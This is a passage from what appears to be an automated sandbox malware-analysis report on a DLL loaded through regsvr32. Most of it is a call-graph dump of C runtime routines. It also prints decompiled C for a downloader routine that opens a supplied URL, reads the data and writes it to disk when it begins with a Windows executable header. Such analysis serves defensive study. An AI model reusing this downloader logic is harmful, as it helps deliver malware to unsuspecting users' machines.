6e9ecc8f 9117->9122 9158 6e9eda79 9118->9158 9123 6e9efd93 GetEnvironmentStringsW 9122->9123 9124 6e9efdaa 9123->9124 9134 6e9efe00 9123->9134 9127 6e9efca5 ___scrt_uninitialize_crt WideCharToMultiByte 9124->9127 9125 6e9efe09 FreeEnvironmentStringsW 9126 6e9ecc94 9125->9126 9126->9111 9135 6e9ecccf 9126->9135 9128 6e9efdc3 9127->9128 9129 6e9ee649 15 API calls 9128->9129 9128->9134 9130 6e9efdd3 9129->9130 9131 6e9efca5 ___scrt_uninitialize_crt WideCharToMultiByte 9130->9131 9132 6e9efdeb 9130->9132 9131->9132 9133 6e9edc0e _free 14 API calls 9132->9133 9133->9134 9134->9125 9134->9126 9137 6e9ecce4 9135->9137 9136 6e9edc48 _unexpected 14 API calls 9145 6e9ecd0b 9136->9145 9137->9136 9138 6e9ecd70 9139 6e9edc0e _free 14 API calls 9138->9139 9140 6e9ecca5 9139->9140 9152 6e9edc0e 9140->9152 9141 6e9edc48 _unexpected 14 API calls 9141->9145 9142 6e9ecd72 9819 6e9ecd9f 9142->9819 9145->9138 9145->9141 9145->9142 9147 6e9ecd92 9145->9147 9150 6e9edc0e _free 14 API calls 9145->9150 9810 6e9ed4ed 9145->9810 9149 6e9ec27c ___std_exception_copy 11 API calls 9147->9149 9148 6e9edc0e _free 14 API calls 9148->9138 9151 6e9ecd9e 9149->9151 9150->9145 9153 6e9edc19 RtlFreeHeap 9152->9153 9154 6e9edc42 
_free 9152->9154 9153->9154 9155 6e9edc2e 9153->9155 9154->9111 9156 6e9ed46d _free 12 API calls 9155->9156 9157 6e9edc34 GetLastError 9156->9157 9157->9154 9159 6e9eda8a 9158->9159 9160 6e9eda84 9158->9160 9164 6e9eda90 9159->9164 9209 6e9edf59 9159->9209 9204 6e9edf1a 9160->9204 9170 6e9edb09 9164->9170 9226 6e9ed547 9164->9226 9165 6e9edaa8 9214 6e9edc48 9165->9214 9185 6e9ef71e 9170->9185 9171 6e9edabc 9174 6e9edf59 _unexpected 6 API calls 9171->9174 9172 6e9edad1 9173 6e9edf59 _unexpected 6 API calls 9172->9173 9176 6e9edadd 9173->9176 9175 6e9edac8 9174->9175 9179 6e9edc0e _free 14 API calls 9175->9179 9177 6e9edaf0 9176->9177 9178 6e9edae1 9176->9178 9221 6e9ed7be 9177->9221 9180 6e9edf59 _unexpected 6 API calls 9178->9180 9182 6e9edace 9179->9182 9180->9175 9182->9164 9184 6e9edc0e _free 14 API calls 9184->9182 9608 6e9ef832 9185->9608 9190 6e9ef74a 9190->9122 9193 6e9ef78d 9196 6e9edc0e _free 14 API calls 9193->9196 9198 6e9ef79b 9196->9198 9197 6e9ef788 9199 6e9ed46d _free 14 API calls 9197->9199 9198->9122 9199->9193 9200 6e9ef7cf 9200->9193 9644 6e9ef3ba 9200->9644 9201 6e9ef7a3 9201->9200 9202 6e9edc0e _free 14 API calls 9201->9202 9202->9200 9237 6e9eddba 9204->9237 9206 6e9edf36 9207 6e9edf3f 9206->9207 9208 6e9edf51 TlsGetValue 9206->9208 9207->9159 9210 6e9eddba _unexpected 5 API calls 9209->9210 9211 6e9edf75 9210->9211 9212 6e9edf93 TlsSetValue 9211->9212 9213 6e9edaa4 9211->9213 9213->9164 9213->9165 9215 6e9edc55 _unexpected 9214->9215 9216 6e9edc95 9215->9216 9217 6e9edc80 HeapAlloc 9215->9217 9250 6e9ec4bb 9215->9250 9253 6e9ed46d 9216->9253 9217->9215 9219 6e9edab4 9217->9219 9219->9171 9219->9172 9290 6e9ed652 9221->9290 9432 6e9eff99 9226->9432 9229 6e9ed557 9231 6e9ed580 9229->9231 9232 6e9ed561 IsProcessorFeaturePresent 9229->9232 9468 6e9ec95b 9231->9468 9234 6e9ed56d 9232->9234 9462 6e9ec0a3 9234->9462 9238 6e9edde8 9237->9238 9242 6e9edde4 _unexpected 9237->9242 9238->9242 9243 6e9edcf3 9238->9243 9241 6e9ede02 GetProcAddress 
9241->9242 9242->9206 9248 6e9edd04 ___vcrt_FlsSetValue 9243->9248 9244 6e9eddaf 9244->9241 9244->9242 9245 6e9edd22 LoadLibraryExW 9246 6e9edd3d GetLastError 9245->9246 9245->9248 9246->9248 9247 6e9edd98 FreeLibrary 9247->9248 9248->9244 9248->9245 9248->9247 9249 6e9edd70 LoadLibraryExW 9248->9249 9249->9248 9256 6e9ec4e8 9250->9256 9267 6e9edb13 GetLastError 9253->9267 9255 6e9ed472 9255->9219 9257 6e9ec4f4 CallCatchBlock 9256->9257 9262 6e9ee955 EnterCriticalSection 9257->9262 9259 6e9ec4ff 9263 6e9ec53b 9259->9263 9262->9259 9266 6e9ee99d LeaveCriticalSection 9263->9266 9265 6e9ec4c6 9265->9215 9266->9265 9268 6e9edb2a 9267->9268 9269 6e9edb30 9267->9269 9271 6e9edf1a _unexpected 6 API calls 9268->9271 9270 6e9edf59 _unexpected 6 API calls 9269->9270 9288 6e9edb36 SetLastError 9269->9288 9272 6e9edb4e 9270->9272 9271->9269 9273 6e9edc48 _unexpected 12 API calls 9272->9273 9272->9288 9274 6e9edb5e 9273->9274 9276 6e9edb7d 9274->9276 9277 6e9edb66 9274->9277 9279 6e9edf59 _unexpected 6 API calls 9276->9279 9278 6e9edf59 _unexpected 6 API calls 9277->9278 9280 6e9edb74 9278->9280 9281 6e9edb89 9279->9281 9285 6e9edc0e _free 12 API calls 9280->9285 9282 6e9edb9e 9281->9282 9283 6e9edb8d 9281->9283 9284 6e9ed7be _unexpected 12 API calls 9282->9284 9286 6e9edf59 _unexpected 6 API calls 9283->9286 9287 6e9edba9 9284->9287 9285->9288 9286->9280 9289 6e9edc0e _free 12 API calls 9287->9289 9288->9255 9289->9288 9291 6e9ed65e CallCatchBlock 9290->9291 9304 6e9ee955 EnterCriticalSection 9291->9304 9293 6e9ed668 9305 6e9ed698 9293->9305 9296 6e9ed764 9297 6e9ed770 CallCatchBlock 9296->9297 9309 6e9ee955 EnterCriticalSection 9297->9309 9299 6e9ed77a 9310 6e9ed945 9299->9310 9301 6e9ed792 9314 6e9ed7b2 9301->9314 9304->9293 9308 6e9ee99d LeaveCriticalSection 9305->9308 9307 6e9ed686 9307->9296 9308->9307 9309->9299 9311 6e9ed954 __fassign 9310->9311 9313 6e9ed97b __fassign 9310->9313 9311->9313 9317 6e9f0367 9311->9317 9313->9301 9431 6e9ee99d LeaveCriticalSection 
9314->9431 9316 6e9ed7a0 9316->9184 9318 6e9f03e7 9317->9318 9320 6e9f037d 9317->9320 9321 6e9edc0e _free 14 API calls 9318->9321 9343 6e9f0435 9318->9343 9320->9318 9325 6e9edc0e _free 14 API calls 9320->9325 9327 6e9f03b0 9320->9327 9322 6e9f0409 9321->9322 9323 6e9edc0e _free 14 API calls 9322->9323 9328 6e9f041c 9323->9328 9324 6e9edc0e _free 14 API calls 9331 6e9f03dc 9324->9331 9333 6e9f03a5 9325->9333 9326 6e9f0443 9332 6e9f04a3 9326->9332 9344 6e9edc0e 14 API calls _free 9326->9344 9329 6e9edc0e _free 14 API calls 9327->9329 9342 6e9f03d2 9327->9342 9330 6e9edc0e _free 14 API calls 9328->9330 9334 6e9f03c7 9329->9334 9335 6e9f042a 9330->9335 9336 6e9edc0e _free 14 API calls 9331->9336 9337 6e9edc0e _free 14 API calls 9332->9337 9345 6e9f180d 9333->9345 9373 6e9f190b 9334->9373 9340 6e9edc0e _free 14 API calls 9335->9340 9336->9318 9341 6e9f04a9 9337->9341 9340->9343 9341->9313 9342->9324 9385 6e9f04d8 9343->9385 9344->9326 9346 6e9f181e 9345->9346 9347 6e9f1907 9345->9347 9348 6e9f182f 9346->9348 9349 6e9edc0e _free 14 API calls 9346->9349 9347->9327 9350 6e9f1841 9348->9350 9352 6e9edc0e _free 14 API calls 9348->9352 9349->9348 9351 6e9f1853 9350->9351 9353 6e9edc0e _free 14 API calls 9350->9353 9354 6e9f1865 9351->9354 9355 6e9edc0e _free 14 API calls 9351->9355 9352->9350 9353->9351 9356 6e9f1877 9354->9356 9357 6e9edc0e _free 14 API calls 9354->9357 9355->9354 9358 6e9f1889 9356->9358 9360 6e9edc0e _free 14 API calls 9356->9360 9357->9356 9359 6e9f189b 9358->9359 9361 6e9edc0e _free 14 API calls 9358->9361 9362 6e9f18ad 9359->9362 9363 6e9edc0e _free 14 API calls 9359->9363 9360->9358 9361->9359 9364 6e9f18bf 9362->9364 9365 6e9edc0e _free 14 API calls 9362->9365 9363->9362 9366 6e9f18d1 9364->9366 9368 6e9edc0e _free 14 API calls 9364->9368 9365->9364 9367 6e9f18e3 9366->9367 9369 6e9edc0e _free 14 API calls 9366->9369 9370 6e9f18f5 9367->9370 9371 6e9edc0e _free 14 API calls 9367->9371 9368->9366 9369->9367 9370->9347 9372 6e9edc0e _free 14 API calls 
9370->9372 9371->9370 9372->9347 9374 6e9f1918 9373->9374 9384 6e9f1970 9373->9384 9375 6e9f1928 9374->9375 9376 6e9edc0e _free 14 API calls 9374->9376 9377 6e9edc0e _free 14 API calls 9375->9377 9378 6e9f193a 9375->9378 9376->9375 9377->9378 9379 6e9edc0e _free 14 API calls 9378->9379 9381 6e9f194c 9378->9381 9379->9381 9380 6e9f195e 9383 6e9edc0e _free 14 API calls 9380->9383 9380->9384 9381->9380 9382 6e9edc0e _free 14 API calls 9381->9382 9382->9380 9383->9384 9384->9342 9386 6e9f04e5 9385->9386 9390 6e9f0504 9385->9390 9386->9390 9391 6e9f19ac 9386->9391 9389 6e9edc0e _free 14 API calls 9389->9390 9390->9326 9392 6e9f04fe 9391->9392 9393 6e9f19bd 9391->9393 9392->9389 9427 6e9f1974 9393->9427 9396 6e9f1974 __fassign 14 API calls 9397 6e9f19d0 9396->9397 9398 6e9f1974 __fassign 14 API calls 9397->9398 9399 6e9f19db 9398->9399 9400 6e9f1974 __fassign 14 API calls 9399->9400 9401 6e9f19e6 9400->9401 9402 6e9f1974 __fassign 14 API calls 9401->9402 9403 6e9f19f4 9402->9403 9404 6e9edc0e _free 14 API calls 9403->9404 9405 6e9f19ff 9404->9405 9406 6e9edc0e _free 14 API calls 9405->9406 9407 6e9f1a0a 9406->9407 9408 6e9edc0e _free 14 API calls 9407->9408 9409 6e9f1a15 9408->9409 9410 6e9f1974 __fassign 14 API calls 9409->9410 9411 6e9f1a23 9410->9411 9412 6e9f1974 __fassign 14 API calls 9411->9412 9413 6e9f1a31 9412->9413 9414 6e9f1974 __fassign 14 API calls 9413->9414 9415 6e9f1a42 9414->9415 9416 6e9f1974 __fassign 14 API calls 9415->9416 9417 6e9f1a50 9416->9417 9418 6e9f1974 __fassign 14 API calls 9417->9418 9419 6e9f1a5e 9418->9419 9420 6e9edc0e _free 14 API calls 9419->9420 9421 6e9f1a69 9420->9421 9422 6e9edc0e _free 14 API calls 9421->9422 9423 6e9f1a74 9422->9423 9424 6e9edc0e _free 14 API calls 9423->9424 9425 6e9f1a7f 9424->9425 9426 6e9edc0e _free 14 API calls 9425->9426 9426->9392 9428 6e9f19a7 9427->9428 9429 6e9f1997 9427->9429 9428->9396 9429->9428 9430 6e9edc0e _free 14 API calls 9429->9430 9430->9429 9431->9316 9471 6e9efecb 9432->9471 9435 6e9effde 
9436 6e9effea CallCatchBlock 9435->9436 9437 6e9edb13 _free 14 API calls 9436->9437 9439 6e9f0011 CallUnexpected 9436->9439 9442 6e9f0017 CallUnexpected 9436->9442 9437->9439 9438 6e9f005e 9440 6e9ed46d _free 14 API calls 9438->9440 9439->9438 9439->9442 9461 6e9f0048 9439->9461 9441 6e9f0063 9440->9441 9482 6e9ec24f 9441->9482 9444 6e9f008a 9442->9444 9485 6e9ee955 EnterCriticalSection 9442->9485 9447 6e9f01bd 9444->9447 9448 6e9f00cc 9444->9448 9458 6e9f00fb 9444->9458 9449 6e9f01c8 9447->9449 9517 6e9ee99d LeaveCriticalSection 9447->9517 9448->9458 9486 6e9ed9bc GetLastError 9448->9486 9452 6e9ec95b CallUnexpected 23 API calls 9449->9452 9454 6e9f01d0 9452->9454 9455 6e9ed9bc _unexpected 37 API calls 9459 6e9f0150 9455->9459 9457 6e9ed9bc _unexpected 37 API calls 9457->9458 9513 6e9f016a 9458->9513 9460 6e9ed9bc _unexpected 37 API calls 9459->9460 9459->9461 9460->9461 9461->9229 9463 6e9ec0bf CallUnexpected 9462->9463 9464 6e9ec0eb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9463->9464 9465 6e9ec1bc CallUnexpected 9464->9465 9531 6e9e9adf 9465->9531 9467 6e9ec1da 9467->9231 9539 6e9ec801 9468->9539 9472 6e9efed7 CallCatchBlock 9471->9472 9477 6e9ee955 EnterCriticalSection 9472->9477 9474 6e9efee5 9478 6e9eff23 9474->9478 9477->9474 9481 6e9ee99d LeaveCriticalSection 9478->9481 9480 6e9ed54c 9480->9229 9480->9435 9481->9480 9518 6e9ec1eb 9482->9518 9484 6e9ec25b 9484->9461 9485->9444 9487 6e9ed9d9 9486->9487 9488 6e9ed9d3 9486->9488 9490 6e9edf59 _unexpected 6 API calls 9487->9490 9509 6e9ed9df SetLastError 9487->9509 9489 6e9edf1a _unexpected 6 API calls 9488->9489 9489->9487 9491 6e9ed9f7 9490->9491 9492 6e9edc48 _unexpected 14 API calls 9491->9492 9491->9509 9493 6e9eda07 9492->9493 9495 6e9eda0f 9493->9495 9496 6e9eda26 9493->9496 9499 6e9edf59 _unexpected 6 API calls 9495->9499 9501 6e9edf59 _unexpected 6 API calls 9496->9501 9497 6e9eda6d 9497->9457 9498 6e9eda73 9500 6e9ed547 CallUnexpected 35 API calls 9498->9500 9510 6e9eda1d 
9499->9510 9502 6e9eda78 9500->9502 9503 6e9eda32 9501->9503 9504 6e9eda36 9503->9504 9505 6e9eda47 9503->9505 9507 6e9edf59 _unexpected 6 API calls 9504->9507 9508 6e9ed7be _unexpected 14 API calls 9505->9508 9506 6e9edc0e _free 14 API calls 9506->9509 9507->9510 9511 6e9eda52 9508->9511 9509->9497 9509->9498 9510->9506 9512 6e9edc0e _free 14 API calls 9511->9512 9512->9509 9514 6e9f0141 9513->9514 9515 6e9f0170 9513->9515 9514->9455 9514->9459 9514->9461 9530 6e9ee99d LeaveCriticalSection 9515->9530 9517->9449 9519 6e9edb13 _free 14 API calls 9518->9519 9520 6e9ec1f6 9519->9520 9523 6e9ec204 9520->9523 9526 6e9ec27c IsProcessorFeaturePresent 9520->9526 9522 6e9ec24e 9524 6e9ec1eb ___std_exception_copy 25 API calls 9522->9524 9523->9484 9525 6e9ec25b 9524->9525 9525->9484 9527 6e9ec288 9526->9527 9528 6e9ec0a3 CallUnexpected 8 API calls 9527->9528 9529 6e9ec29d GetCurrentProcess TerminateProcess 9528->9529 9529->9522 9530->9514 9532 6e9e9ae8 IsProcessorFeaturePresent 9531->9532 9533 6e9e9ae7 9531->9533 9535 6e9e9b2a 9532->9535 9533->9467 9538 6e9e9aed SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9535->9538 9537 6e9e9c0d 9537->9467 9538->9537 9540 6e9ec80f 9539->9540 9549 6e9ec820 9539->9549 9550 6e9ec8a7 GetModuleHandleW 9540->9550 9545 6e9ec85a 9557 6e9ec6c7 9549->9557 9551 6e9ec814 9550->9551 9551->9549 9552 6e9ec8ea GetModuleHandleExW 9551->9552 9553 6e9ec909 GetProcAddress 9552->9553 9554 6e9ec91e 9552->9554 9553->9554 9555 6e9ec93b 9554->9555 9556 6e9ec932 FreeLibrary 9554->9556 9555->9549 9556->9555 9558 6e9ec6d3 CallCatchBlock 9557->9558 9573 6e9ee955 EnterCriticalSection 9558->9573 9560 6e9ec6dd 9574 6e9ec714 9560->9574 9562 6e9ec6ea 9578 6e9ec708 9562->9578 9565 6e9ec865 9601 6e9ee9b4 GetPEB 9565->9601 9568 6e9ec894 9571 6e9ec8ea CallUnexpected 3 API calls 9568->9571 9569 6e9ec874 GetPEB 9569->9568 9570 6e9ec884 GetCurrentProcess TerminateProcess 9569->9570 9570->9568 9572 6e9ec89c ExitProcess 9571->9572 
9573->9560 9575 6e9ec720 CallCatchBlock 9574->9575 9576 6e9ec781 CallUnexpected 9575->9576 9581 6e9ed157 9575->9581 9576->9562 9600 6e9ee99d LeaveCriticalSection 9578->9600 9580 6e9ec6f6 9580->9545 9580->9565 9584 6e9ece69 9581->9584 9585 6e9ece75 CallCatchBlock 9584->9585 9592 6e9ee955 EnterCriticalSection 9585->9592 9587 6e9ece83 9593 6e9ed067 9587->9593 9592->9587 9594 6e9ed086 9593->9594 9595 6e9ece90 9593->9595 9594->9595 9596 6e9edc0e _free 14 API calls 9594->9596 9597 6e9eceb8 9595->9597 9596->9595 9598 6e9ee99d CallUnexpected LeaveCriticalSection 9597->9598 9599 6e9ecea1 9598->9599 9599->9576 9600->9580 9602 6e9ee9ce 9601->9602 9603 6e9ec86f 9601->9603 9605 6e9ede3d 9602->9605 9603->9568 9603->9569 9606 6e9eddba _unexpected 5 API calls 9605->9606 9607 6e9ede59 9606->9607 9607->9603 9609 6e9ef83e CallCatchBlock 9608->9609 9610 6e9ef858 9609->9610 9652 6e9ee955 EnterCriticalSection 9609->9652 9613 6e9ef731 9610->9613 9615 6e9ed547 CallUnexpected 37 API calls 9610->9615 9612 6e9ef894 9653 6e9ef8b1 9612->9653 9619 6e9ef4c8 9613->9619 9617 6e9ef8d1 9615->9617 9616 6e9ef868 9616->9612 9618 6e9edc0e _free 14 API calls 9616->9618 9618->9612 9657 6e9ec407 9619->9657 9622 6e9ef4fb 9624 6e9ef512 9622->9624 9625 6e9ef500 GetACP 9622->9625 9623 6e9ef4e9 GetOEMCP 9623->9624 9624->9190 9626 6e9ee649 9624->9626 9625->9624 9627 6e9ee687 9626->9627 9628 6e9ee657 _unexpected 9626->9628 9629 6e9ed46d _free 14 API calls 9627->9629 9628->9627 9630 6e9ee672 RtlAllocateHeap 9628->9630 9632 6e9ec4bb _unexpected 2 API calls 9628->9632 9631 6e9ee685 9629->9631 9630->9628 9630->9631 9631->9193 9633 6e9ef92d 9631->9633 9632->9628 9634 6e9ef4c8 39 API calls 9633->9634 9635 6e9ef94d 9634->9635 9637 6e9ef987 IsValidCodePage 9635->9637 9642 6e9ef9c3 CallUnexpected 9635->9642 9636 6e9e9adf _ValidateLocalCookies 5 API calls 9638 6e9ef780 9636->9638 9639 6e9ef999 9637->9639 9637->9642 9638->9197 9638->9201 9640 6e9ef9c8 GetCPInfo 9639->9640 9641 6e9ef9a2 CallUnexpected 9639->9641 9640->9641 
9640->9642 9700 6e9ef59e 9641->9700 9642->9636 9645 6e9ef3c6 CallCatchBlock 9644->9645 9784 6e9ee955 EnterCriticalSection 9645->9784 9647 6e9ef3d0 9785 6e9ef407 9647->9785 9652->9616 9656 6e9ee99d LeaveCriticalSection 9653->9656 9655 6e9ef8b8 9655->9610 9656->9655 9658 6e9ec427 9657->9658 9659 6e9ec41e 9657->9659 9658->9659 9660 6e9ed9bc _unexpected 37 API calls 9658->9660 9659->9622 9659->9623 9661 6e9ec447 9660->9661 9665 6e9ee7f3 9661->9665 9666 6e9ee806 9665->9666 9668 6e9ec45d 9665->9668 9666->9668 9673 6e9f05b3 9666->9673 9669 6e9ee820 9668->9669 9670 6e9ee833 9669->9670 9672 6e9ee848 9669->9672 9670->9672 9695 6e9ef91a 9670->9695 9672->9659 9674 6e9f05bf CallCatchBlock 9673->9674 9675 6e9ed9bc _unexpected 37 API calls 9674->9675 9676 6e9f05c8 9675->9676 9683 6e9f060e 9676->9683 9686 6e9ee955 EnterCriticalSection 9676->9686 9678 6e9f05e6 9687 6e9f0634 9678->9687 9683->9668 9684 6e9ed547 CallUnexpected 37 API calls 9685 6e9f0633 9684->9685 9686->9678 9688 6e9f05f7 9687->9688 9689 6e9f0642 __fassign 9687->9689 9691 6e9f0613 9688->9691 9689->9688 9690 6e9f0367 __fassign 14 API calls 9689->9690 9690->9688 9694 6e9ee99d LeaveCriticalSection 9691->9694 9693 6e9f060a 9693->9683 9693->9684 9694->9693 9696 6e9ed9bc _unexpected 37 API calls 9695->9696 9697 6e9ef924 9696->9697 9698 6e9ef832 __fassign 37 API calls 9697->9698 9699 6e9ef92a 9698->9699 9699->9672 9701 6e9ef5c6 GetCPInfo 9700->9701 9702 6e9ef68f 9700->9702 9701->9702 9707 6e9ef5de 9701->9707 9703 6e9e9adf _ValidateLocalCookies 5 API calls 9702->9703 9704 6e9ef71c 9703->9704 9704->9642 9711 6e9f1a90 9707->9711 9710 6e9f243e 41 API calls 9710->9702 9712 6e9ec407 __fassign 37 API calls 9711->9712 9713 6e9f1ab0 9712->9713 9731 6e9efc29 9713->9731 9715 6e9f1add 9716 6e9f1b03 CallUnexpected 9715->9716 9719 6e9ee649 15 API calls 9715->9719 9722 6e9f1b6e 9715->9722 9718 6e9f1b68 9716->9718 9723 6e9efc29 __fassign MultiByteToWideChar 9716->9723 9717 6e9e9adf _ValidateLocalCookies 5 API calls 9720 6e9ef646 9717->9720 
9734 6e9f1b93 9718->9734 9719->9716 9726 6e9f243e 9720->9726 9722->9717 9724 6e9f1b51 9723->9724 9724->9718 9725 6e9f1b58 GetStringTypeW 9724->9725 9725->9718 9727 6e9ec407 __fassign 37 API calls 9726->9727 9728 6e9f2451 9727->9728 9738 6e9f2254 9728->9738 9733 6e9efc3a MultiByteToWideChar 9731->9733 9733->9715 9735 6e9f1b9f 9734->9735 9737 6e9f1bb0 9734->9737 9736 6e9edc0e _free 14 API calls 9735->9736 9735->9737 9736->9737 9737->9722 9739 6e9f226f 9738->9739 9740 6e9efc29 __fassign MultiByteToWideChar 9739->9740 9743 6e9f22b3 9740->9743 9741 6e9f2418 9742 6e9e9adf _ValidateLocalCookies 5 API calls 9741->9742 9744 6e9ef667 9742->9744 9743->9741 9745 6e9ee649 15 API calls 9743->9745 9750 6e9f22d8 9743->9750 9744->9710 9745->9750 9746 6e9f237d 9749 6e9f1b93 __freea 14 API calls 9746->9749 9747 6e9efc29 __fassign MultiByteToWideChar 9748 6e9f231e 9747->9748 9748->9746 9766 6e9edfe6 9748->9766 9749->9741 9750->9746 9750->9747 9753 6e9f238c 9755 6e9ee649 15 API calls 9753->9755 9759 6e9f239e 9753->9759 9754 6e9f2354 9754->9746 9756 6e9edfe6 6 API calls 9754->9756 9755->9759 9756->9746 9757 6e9f2409 9758 6e9f1b93 __freea 14 API calls 9757->9758 9758->9746 9759->9757 9760 6e9edfe6 6 API calls 9759->9760 9761 6e9f23e6 9760->9761 9761->9757 9772 6e9efca5 9761->9772 9763 6e9f2400 9763->9757 9764 6e9f2435 9763->9764 9765 6e9f1b93 __freea 14 API calls 9764->9765 9765->9746 9775 6e9edcbf 9766->9775 9770 6e9ee037 LCMapStringW 9771 6e9edff7 9770->9771 9771->9746 9771->9753 9771->9754 9773 6e9efcbc WideCharToMultiByte 9772->9773 9773->9763 9776 6e9eddba _unexpected 5 API calls 9775->9776 9777 6e9edcd5 9776->9777 9777->9771 9778 6e9ee043 9777->9778 9781 6e9edcd9 9778->9781 9780 6e9ee04e 9780->9770 9782 6e9eddba _unexpected 5 API calls 9781->9782 9783 6e9edcef 9782->9783 9783->9780 9784->9647 9795 6e9efb20 9785->9795 9787 6e9ef429 9788 6e9efb20 25 API calls 9787->9788 9789 6e9ef448 9788->9789 9790 6e9ef3dd 9789->9790 9791 6e9edc0e _free 14 API calls 9789->9791 9792 6e9ef3fb 
9790->9792 9791->9790 9809 6e9ee99d LeaveCriticalSection 9792->9809 9794 6e9ef3e9 9794->9193 9796 6e9efb31 9795->9796 9805 6e9efb2d __InternalCxxFrameHandler 9795->9805 9797 6e9efb38 9796->9797 9799 6e9efb4b CallUnexpected 9796->9799 9798 6e9ed46d _free 14 API calls 9797->9798 9800 6e9efb3d 9798->9800 9802 6e9efb79 9799->9802 9803 6e9efb82 9799->9803 9799->9805 9801 6e9ec24f ___std_exception_copy 25 API calls 9800->9801 9801->9805 9804 6e9ed46d _free 14 API calls 9802->9804 9803->9805 9807 6e9ed46d _free 14 API calls 9803->9807 9806 6e9efb7e 9804->9806 9805->9787 9808 6e9ec24f ___std_exception_copy 25 API calls 9806->9808 9807->9806 9808->9805 9809->9794 9811 6e9ed4fa 9810->9811 9812 6e9ed508 9810->9812 9811->9812 9817 6e9ed51f 9811->9817 9813 6e9ed46d _free 14 API calls 9812->9813 9814 6e9ed510 9813->9814 9815 6e9ec24f ___std_exception_copy 25 API calls 9814->9815 9816 6e9ed51a 9815->9816 9816->9145 9817->9816 9818 6e9ed46d _free 14 API calls 9817->9818 9818->9814 9823 6e9ecdac 9819->9823 9824 6e9ecd78 9819->9824 9820 6e9ecdc3 9822 6e9edc0e _free 14 API calls 9820->9822 9821 6e9edc0e _free 14 API calls 9821->9823 9822->9824 9823->9820 9823->9821 9824->9148 10249 6e9e95e3 10250 6e9e95ec 10249->10250 10251 6e9e95f1 10249->10251 10266 6e9e99f5 10250->10266 10255 6e9e94ad 10251->10255 10256 6e9e94b9 CallCatchBlock 10255->10256 10257 6e9e94e2 dllmain_raw 10256->10257 10258 6e9e94c8 10256->10258 10259 6e9e94dd __DllMainCRTStartup@12 10256->10259 10257->10258 10260 6e9e94fc dllmain_crt_dispatch 10257->10260 10261 6e9e954e 10259->10261 10264 6e9e93fd __DllMainCRTStartup@12 84 API calls 10259->10264 10260->10258 10260->10259 10261->10258 10262 6e9e9557 dllmain_crt_dispatch 10261->10262 10262->10258 10263 6e9e956a dllmain_raw 10262->10263 10263->10258 10265 6e9e9543 dllmain_raw 10264->10265 10265->10261 10267 6e9e9a0b 10266->10267 10269 6e9e9a14 10267->10269 10270 6e9e99a8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10267->10270 
10269->10251 10270->10269

    Control-flow Graph

    C-Code - Quality: 63%
    			E6E9E8210(char* _a4, intOrPtr _a8) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				struct _OVERLAPPED* _v20;
    				void* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				void* _v52;
    				long _v56;
    				long _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				long _v72;
    				void* _t53;
    				void* _t57;
    
    				_v20 = 0;
    				_v28 = E6E9E2400(0, 0);
    				_v32 = _v28(_a4, 1, 0);
    				if(_v32 != 0) {
    					_v36 = E6E9E2610(0, 0);
    					_v16 = _v36(0, 0, 0, 0, 0);
    					_t53 = E6E9E17B0(_a8, 0x40000000, 0, 0, 2, 0x80, 0); // executed
    					_v8 = _t53;
    					_v40 = E6E9E26A0(0, 0);
    					_v24 = InternetOpenUrlA(_v16, _a4, 0, 0, 0x84000000, 0);
    					if(_v24 != 0) {
    						while(1) {
    							_t57 = E6E9E1910(0, 0x100000, 0x3000, 4); // executed
    							_v12 = _t57;
    							_v48 = E6E9E24F0(0, 0);
    							if(InternetReadFile(_v24, _v12, 0x100000,  &_v56) == 0) {
    								break;
    							}
    							_v52 = _v12;
    							if(( *_v52 & 0x0000ffff) == 0x5a4d) {
    								_v64 = E6E9E2490(0, 0);
    								_v60 = _v56;
    								WriteFile(_v8, _v12, _v60,  &_v72, 0);
    								_v20 =  &(_v20->Internal);
    								if(1 != 0) {
    									continue;
    								}
    								L9:
    								E6E9E1760(_v8);
    								_v68 = E6E9E23A0(0, 0);
    								InternetCloseHandle(_v16);
    								E6E9E1960(_v12, 0, 0x8000); // executed
    								if(_v20 != 0) {
    									return 1;
    								}
    								return 0;
    							}
    							goto L9;
    						}
    						E6E9E1760(_v8);
    						return 0;
    					}
    					E6E9E1760(_v8);
    					_v44 = E6E9E23A0(0, 0);
    					_v44(_v16);
    					return 0;
    				}
    				return 0;
    			}

    APIs
    • InternetCheckConnectionA.WININET(?,00000001,00000000,00000000,00000000), ref: 6E9E8231
    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000,00000000,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 6E9E829D
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: Internet$CheckConnectionOpen
    • String ID:
    • API String ID: 2967963609-0
    • Opcode ID: 87d2ecc2a921718bd2409e37d0c74111003fcbfcd807252781c794f132c2f2d4
    • Instruction ID: 0ba2b3a986dc3f784bab7f8129c3519c07479f21050774620367033d1cb1b194
    • Opcode Fuzzy Hash: 87d2ecc2a921718bd2409e37d0c74111003fcbfcd807252781c794f132c2f2d4
    • Instruction Fuzzy Hash: 1851F8B4E44209BBEB55DBE4CC45FEEB6B8AF48B04F104919F705BA6C0D7B1A9408F64
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 82%
    			E6E9E93FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t34;
    				signed int _t40;
    				signed int _t41;
    				signed int _t42;
    				signed int _t45;
    				signed char _t54;
    				signed int _t56;
    				signed int _t58;
    				void* _t61;
    				void* _t68;
    				signed int _t72;
    				signed int _t76;
    				signed int _t80;
    				void* _t82;
    
    				_t68 = __edx;
    				_push(0x10);
